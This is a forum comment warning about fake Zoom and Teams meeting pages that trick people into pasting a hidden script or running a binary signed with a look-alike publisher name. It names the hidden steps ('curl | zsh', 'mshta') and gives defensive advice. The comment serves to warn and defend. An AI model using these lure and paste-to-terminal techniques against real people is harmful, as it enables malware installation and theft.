they are cloning Zoom and MS Teams, and try to get people to either copy a script (which is in a textarea that's conveniently too small to show the whole script, and scrollbars are hidden by CSS, and there's a copy button, and when you paste it into the terminal you'll see last few lines, also look innocent, but there's a curl | zsh or `mshta` somewhere in there), download and run a binary/.dmg (and it might be even signed by GoogIe LLC. - the name chosen to look good in the usual typeface used on macOS).

...

it seems the correct muscle memory response to train into people is that "if some meeting link someone sent you doesn't work, then you should create one and send them the link"

(and of course never download and execute anything, don't copy scripts into terminals, but it seems even veteran maintainers do this, etc...)

see Infection Chain here https://cloud.google.com/blog/topics/threat-intelligence/unc...

textarea at the bottom of this comment: https://github.com/axios/axios/issues/10636#issuecomment-418...